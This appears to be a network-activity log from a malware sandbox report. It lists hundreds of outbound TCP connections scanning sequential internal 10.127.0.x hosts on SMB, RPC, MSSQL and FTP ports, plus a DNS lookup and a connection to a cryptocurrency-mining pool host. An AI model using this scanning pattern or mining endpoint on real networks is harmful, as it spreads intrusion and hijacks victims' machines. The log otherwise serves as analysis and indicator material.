N/A 10.127.0.78:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.89:19490 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.89:19490 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.89:1433 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.0:135 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.80:135 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.89:21 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.0:1433 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.1:1433 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.2:1433 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.3:1433 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.4:1433 tcp
N/A 10.127.0.5:1433 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.7:1433 tcp
N/A 10.127.0.6:1433 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.8:1433 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.9:1433 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.10:1433 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.11:1433 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.13:1433 tcp
N/A 10.127.0.12:1433 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.15:1433 tcp
N/A 10.127.0.14:1433 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.16:1433 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.18:1433 tcp
N/A 10.127.0.17:1433 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.19:1433 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.20:1433 tcp
N/A 10.127.0.21:1433 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.22:1433 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.23:1433 tcp
N/A 10.127.0.24:1433 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.25:1433 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.26:1433 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.27:1433 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.28:1433 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.30:1433 tcp
N/A 10.127.0.29:1433 tcp
N/A 10.127.0.31:1433 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.32:1433 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.33:1433 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.34:1433 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.35:1433 tcp
N/A 10.127.0.36:1433 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.37:1433 tcp
N/A 10.127.0.38:1433 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.39:1433 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.40:1433 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.42:1433 tcp
N/A 10.127.0.41:1433 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.44:1433 tcp
N/A 10.127.0.43:1433 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.45:1433 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.46:1433 tcp
N/A 10.127.0.47:1433 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.49:1433 tcp
N/A 10.127.0.48:1433 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.50:1433 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.51:1433 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.52:1433 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.53:1433 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.54:1433 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.55:1433 tcp
N/A 10.127.0.57:1433 tcp
N/A 10.127.0.56:1433 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.58:1433 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.59:1433 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.60:1433 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.61:1433 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.62:1433 tcp
N/A 10.127.0.63:1433 tcp
N/A 10.127.0.64:1433 tcp
N/A 10.127.0.65:1433 tcp
N/A 10.127.0.66:1433 tcp
N/A 10.127.0.67:1433 tcp
N/A 10.127.0.68:1433 tcp
N/A 10.127.0.69:1433 tcp
N/A 10.127.0.72:1433 tcp
N/A 10.127.0.70:1433 tcp
N/A 10.127.0.71:1433 tcp
N/A 10.127.0.73:1433 tcp
N/A 10.127.0.74:1433 tcp
N/A 10.127.0.76:1433 tcp
N/A 10.127.0.75:1433 tcp
N/A 10.127.0.77:1433 tcp
N/A 10.127.0.78:1433 tcp
N/A 10.127.0.79:1433 tcp
N/A 10.127.0.80:1433 tcp
N/A 10.127.0.81:1433 tcp
N/A 10.127.0.82:1433 tcp
N/A 10.127.0.83:1433 tcp
N/A 10.127.0.84:1433 tcp
N/A 10.127.0.85:1433 tcp
N/A 10.127.0.86:1433 tcp
N/A 10.127.0.87:1433 tcp
N/A 10.127.0.88:1433 tcp
N/A 10.127.0.90:1433 tcp
N/A 10.127.0.92:1433 tcp
N/A 10.127.0.91:1433 tcp
N/A 10.127.0.93:1433 tcp
N/A 10.127.0.94:1433 tcp
N/A 10.127.0.97:1433 tcp
N/A 10.127.0.96:1433 tcp
N/A 10.127.0.95:1433 tcp
N/A 10.127.0.98:1433 tcp
N/A 10.127.0.99:1433 tcp
N/A 10.127.0.100:1433 tcp
N/A 10.127.0.101:1433 tcp
N/A 10.127.0.102:1433 tcp
N/A 10.127.0.105:1433 tcp
N/A 10.127.0.103:1433 tcp
N/A 10.127.0.104:1433 tcp
N/A 10.127.0.106:1433 tcp
N/A 10.127.0.107:1433 tcp
N/A 10.127.0.108:1433 tcp
N/A 10.127.0.109:1433 tcp
N/A 10.127.0.112:1433 tcp
N/A 10.127.0.111:1433 tcp
N/A 10.127.0.110:1433 tcp
N/A 10.127.0.113:1433 tcp
N/A 10.127.0.114:1433 tcp
N/A 10.127.0.116:1433 tcp
N/A 10.127.0.115:1433 tcp
N/A 10.127.0.117:1433 tcp
N/A 10.127.0.118:1433 tcp
N/A 10.127.0.119:1433 tcp
N/A 10.127.0.89:19490 tcp
N/A 10.127.0.120:1433 tcp
N/A 10.127.0.121:1433 tcp
N/A 10.127.0.122:1433 tcp
N/A 10.127.0.123:1433 tcp
N/A 10.127.0.124:1433 tcp
N/A 10.127.0.125:1433 tcp
N/A 10.127.0.126:1433 tcp
N/A 10.127.0.127:1433 tcp
N/A 10.127.0.128:1433 tcp
N/A 10.127.0.130:1433 tcp
N/A 10.127.0.129:1433 tcp
N/A 10.127.0.131:1433 tcp
N/A 10.127.0.134:1433 tcp
N/A 10.127.0.133:1433 tcp
N/A 10.127.0.132:1433 tcp
N/A 10.127.0.135:1433 tcp
N/A 10.127.0.136:1433 tcp
N/A 10.127.0.137:1433 tcp
N/A 10.127.0.138:1433 tcp
N/A 10.127.0.139:1433 tcp
N/A 10.127.0.140:1433 tcp
N/A 10.127.0.142:1433 tcp
N/A 10.127.0.141:1433 tcp
N/A 10.127.0.143:1433 tcp
N/A 10.127.0.145:1433 tcp
N/A 10.127.0.146:1433 tcp
N/A 10.127.0.144:1433 tcp
N/A 10.127.0.147:1433 tcp
N/A 10.127.0.148:1433 tcp
N/A 10.127.0.149:1433 tcp
N/A 10.127.0.150:1433 tcp
N/A 10.127.0.151:1433 tcp
N/A 10.127.0.152:1433 tcp
N/A 10.127.0.153:1433 tcp
N/A 10.127.0.154:1433 tcp
N/A 10.127.0.155:1433 tcp
N/A 10.127.0.157:1433 tcp
N/A 10.127.0.158:1433 tcp
N/A 10.127.0.156:1433 tcp
N/A 10.127.0.159:1433 tcp
N/A 10.127.0.160:1433 tcp
N/A 10.127.0.161:1433 tcp
N/A 10.127.0.162:1433 tcp
N/A 10.127.0.163:1433 tcp
N/A 10.127.0.164:1433 tcp
N/A 10.127.0.166:1433 tcp
N/A 10.127.0.165:1433 tcp
N/A 10.127.0.167:1433 tcp
N/A 10.127.0.168:1433 tcp
N/A 10.127.0.169:1433 tcp
N/A 10.127.0.171:1433 tcp
N/A 10.127.0.170:1433 tcp
N/A 10.127.0.172:1433 tcp
N/A 10.127.0.173:1433 tcp
N/A 10.127.0.175:1433 tcp
N/A 10.127.0.174:1433 tcp
N/A 10.127.0.176:1433 tcp
N/A 10.127.0.177:1433 tcp
N/A 10.127.0.178:1433 tcp
N/A 10.127.0.179:1433 tcp
N/A 10.127.0.180:1433 tcp
N/A 10.127.0.181:1433 tcp
N/A 10.127.0.182:1433 tcp
N/A 10.127.0.183:1433 tcp
N/A 10.127.0.185:1433 tcp
N/A 10.127.0.184:1433 tcp
N/A 10.127.0.186:1433 tcp
N/A 10.127.0.187:1433 tcp
N/A 10.127.0.188:1433 tcp
N/A 10.127.0.190:1433 tcp
N/A 10.127.0.189:1433 tcp
N/A 10.127.0.191:1433 tcp
N/A 10.127.0.0:21 tcp
N/A 10.127.0.192:1433 tcp
N/A 10.127.0.1:21 tcp
N/A 10.127.0.193:1433 tcp
N/A 10.127.0.194:1433 tcp
N/A 10.127.0.2:21 tcp
N/A 10.127.0.195:1433 tcp
N/A 10.127.0.3:21 tcp
N/A 10.127.0.196:1433 tcp
N/A 10.127.0.197:1433 tcp
N/A 10.127.0.5:21 tcp
N/A 10.127.0.4:21 tcp
N/A 10.127.0.6:21 tcp
N/A 10.127.0.7:21 tcp
N/A 10.127.0.198:1433 tcp
N/A 10.127.0.199:1433 tcp
N/A 10.127.0.8:21 tcp
N/A 10.127.0.201:1433 tcp
N/A 10.127.0.200:1433 tcp
N/A 10.127.0.9:21 tcp
N/A 10.127.0.202:1433 tcp
N/A 10.127.0.10:21 tcp
N/A 10.127.0.203:1433 tcp
N/A 10.127.0.11:21 tcp
N/A 10.127.0.204:1433 tcp
N/A 10.127.0.13:21 tcp
N/A 10.127.0.12:21 tcp
N/A 10.127.0.205:1433 tcp
N/A 10.127.0.206:1433 tcp
N/A 10.127.0.14:21 tcp
N/A 10.127.0.15:21 tcp
N/A 10.127.0.16:21 tcp
N/A 10.127.0.207:1433 tcp
N/A 10.127.0.17:21 tcp
N/A 10.127.0.18:21 tcp
N/A 10.127.0.209:1433 tcp
N/A 10.127.0.208:1433 tcp
N/A 10.127.0.19:21 tcp
N/A 10.127.0.210:1433 tcp
N/A 10.127.0.211:1433 tcp
N/A 10.127.0.212:1433 tcp
N/A 10.127.0.21:21 tcp
N/A 10.127.0.20:21 tcp
N/A 10.127.0.22:21 tcp
N/A 10.127.0.23:21 tcp
N/A 10.127.0.24:21 tcp
N/A 10.127.0.25:21 tcp
N/A 10.127.0.26:21 tcp
N/A 10.127.0.27:21 tcp
N/A 10.127.0.220:1433 tcp
N/A 10.127.0.219:1433 tcp
N/A 10.127.0.218:1433 tcp
N/A 10.127.0.216:1433 tcp
N/A 10.127.0.217:1433 tcp
N/A 10.127.0.214:1433 tcp
N/A 10.127.0.215:1433 tcp
N/A 10.127.0.28:21 tcp
N/A 10.127.0.213:1433 tcp
N/A 10.127.0.29:21 tcp
N/A 10.127.0.30:21 tcp
N/A 10.127.0.221:1433 tcp
N/A 10.127.0.222:1433 tcp
N/A 10.127.0.31:21 tcp
N/A 10.127.0.223:1433 tcp
N/A 10.127.0.32:21 tcp
N/A 10.127.0.224:1433 tcp
N/A 10.127.0.33:21 tcp
N/A 10.127.0.225:1433 tcp
N/A 10.127.0.34:21 tcp
N/A 10.127.0.35:21 tcp
N/A 10.127.0.36:21 tcp
N/A 10.127.0.38:21 tcp
N/A 10.127.0.37:21 tcp
N/A 10.127.0.39:21 tcp
N/A 10.127.0.230:1433 tcp
N/A 10.127.0.229:1433 tcp
N/A 10.127.0.228:1433 tcp
N/A 10.127.0.226:1433 tcp
N/A 10.127.0.227:1433 tcp
N/A 10.127.0.231:1433 tcp
N/A 10.127.0.40:21 tcp
N/A 10.127.0.233:1433 tcp
N/A 10.127.0.232:1433 tcp
N/A 10.127.0.42:21 tcp
N/A 10.127.0.41:21 tcp
N/A 10.127.0.234:1433 tcp
N/A 10.127.0.235:1433 tcp
N/A 10.127.0.44:21 tcp
N/A 10.127.0.43:21 tcp
N/A 10.127.0.236:1433 tcp
N/A 10.127.0.53:21 tcp
N/A 10.127.0.52:21 tcp
N/A 10.127.0.51:21 tcp
N/A 10.127.0.49:21 tcp
N/A 10.127.0.50:21 tcp
N/A 10.127.0.48:21 tcp
N/A 10.127.0.46:21 tcp
N/A 10.127.0.47:21 tcp
N/A 10.127.0.45:21 tcp
N/A 10.127.0.54:21 tcp
N/A 10.127.0.57:21 tcp
N/A 10.127.0.56:21 tcp
N/A 10.127.0.55:21 tcp
N/A 10.127.0.249:1433 tcp
N/A 10.127.0.248:1433 tcp
N/A 10.127.0.246:1433 tcp
N/A 10.127.0.247:1433 tcp
N/A 10.127.0.244:1433 tcp
N/A 10.127.0.243:1433 tcp
N/A 10.127.0.245:1433 tcp
N/A 10.127.0.240:1433 tcp
N/A 10.127.0.241:1433 tcp
N/A 10.127.0.242:1433 tcp
N/A 10.127.0.239:1433 tcp
N/A 10.127.0.237:1433 tcp
N/A 10.127.0.238:1433 tcp
N/A 10.127.0.250:1433 tcp
N/A 10.127.0.58:21 tcp
N/A 10.127.0.59:21 tcp
N/A 10.127.0.60:21 tcp
N/A 10.127.0.61:21 tcp
N/A 10.127.0.62:21 tcp
N/A 10.127.0.63:21 tcp
N/A 10.127.0.64:21 tcp
N/A 10.127.0.254:1433 tcp
N/A 10.127.0.253:1433 tcp
N/A 10.127.0.252:1433 tcp
N/A 10.127.0.251:1433 tcp
N/A 10.127.0.65:21 tcp
N/A 10.127.0.66:21 tcp
N/A 10.127.0.67:21 tcp
N/A 10.127.0.68:21 tcp
N/A 10.127.0.69:21 tcp
N/A 10.127.0.71:21 tcp
N/A 10.127.0.70:21 tcp
N/A 10.127.0.72:21 tcp
N/A 10.127.0.73:21 tcp
N/A 10.127.0.74:21 tcp
N/A 10.127.0.75:21 tcp
N/A 10.127.0.76:21 tcp
N/A 10.127.0.77:21 tcp
N/A 10.127.0.78:21 tcp
N/A 10.127.0.79:21 tcp
N/A 10.127.0.80:21 tcp
N/A 10.127.0.81:21 tcp
US 8.8.8.8:53 auto.c3pool.org udp
N/A 10.127.0.82:21 tcp
N/A 10.127.0.83:21 tcp
N/A 10.127.0.84:21 tcp
N/A 10.127.0.86:21 tcp
N/A 10.127.0.85:21 tcp
DE 88.198.117.174:19999 auto.c3pool.org tcp
N/A 10.127.0.87:21 tcp
N/A 10.127.0.88:21 tcp
N/A 10.127.0.90:21 tcp
N/A 10.127.0.91:21 tcp
N/A 10.127.0.92:21 tcp
N/A 10.127.0.93:21 tcp
N/A 10.127.0.94:21 tcp
N/A 10.127.0.96:21 tcp
N/A 10.127.0.97:21 tcp
N/A 10.127.0.95:21 tcp
N/A 10.127.0.98:21 tcp
N/A 10.127.0.100:21 tcp
N/A 10.127.0.101:21 tcp
N/A 10.127.0.99:21 tcp
N/A 10.127.0.102:21 tcp
N/A 10.127.0.104:21 tcp
N/A 10.127.0.105:21 tcp
N/A 10.127.0.103:21 tcp
N/A 10.127.0.106:21 tcp
N/A 10.127.0.108:21 tcp
N/A 10.127.0.107:21 tcp
N/A 10.127.0.109:21 tcp
N/A 10.127.0.110:21 tcp
N/A 10.127.0.111:21 tcp
N/A 10.127.0.112:21 tcp
N/A 10.127.0.113:21 tcp
N/A 10.127.0.115:21 tcp
N/A 10.127.0.116:21 tcp
N/A 10.127.0.114:21 tcp
N/A 10.127.0.117:21 tcp
N/A 10.127.0.118:21 tcp
N/A 10.127.0.119:21 tcp
N/A 10.127.0.120:21 tcp
N/A 10.127.0.121:21 tcp
N/A 10.127.0.122:21 tcp
N/A 10.127.0.123:21 tcp
N/A 10.127.0.124:21 tcp
N/A 10.127.0.125:21 tcp
